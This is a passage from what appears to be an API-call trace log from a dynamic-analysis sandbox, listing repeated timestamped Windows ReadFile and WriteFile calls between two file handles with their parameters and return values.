lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x278, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.165] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.166] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x280, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.166] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.167] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x29b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.167] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.168] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x299, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.168] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.169] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x28a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.169] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.169] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x263, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.170] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.170] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x258, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.171] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.171] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2aa, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.172] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.172] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.172] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.173] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x27c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.173] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.174] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x1ef, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.174] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.175] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x290, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.175] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.176] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x285, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.176] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.177] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3c5, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.177] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.178] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x288, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.178] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.179] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x35b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.179] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.180] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.180] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.180] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2e1, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.181] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.181] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x377, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.182] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.182] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.183] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x14b, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.183] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.184] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.184] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x53, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.185] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.185] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a7, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.185] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.186] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x26a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.186] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.187] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x273, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.187] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.188] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bf, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.188] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.189] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2d9, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.189] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.190] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2bd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.190] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.192] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2df, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.192] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.193] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2ed, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.193] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.194] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2fd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.194] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.195] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x32f, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.195] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.196] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x33d, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.196] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.197] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x396, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.197] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.198] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x296, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.198] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.198] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3b0, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.199] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.199] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2f2, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.200] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.200] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2cd, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.201] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.201] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x369, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.202] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.202] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x385, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.202] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.203] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.203] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x8c, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.204] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.204] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x38a, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.205] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.205] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.206] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.206] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.207] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.207] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x3e, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.208] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.208] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.209] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x16, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.209] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.210] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x400, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.210] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x171, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.211] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.211] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x2a8, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0 | out: lpBuffer=0x4bd3c0*, lpNumberOfBytesWritten=0x4bd370, lpOverlapped=0x0) returned 1 [0023.212] ReadFile (in: hFile=0x2b0, lpBuffer=0x4bd234, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x4bd1fc, lpOverlapped=0x0 | out: lpBuffer=0x4bd234*, lpNumberOfBytesRead=0x4bd1fc*=0x200, lpOverlapped=0x0) returned 1 [0023.212] WriteFile (in: hFile=0x2b4, lpBuffer=0x4bd3c0*, nNumberOfBytesToWrite=0x286, lpNumberOfBytesWritten=0x4bd370, 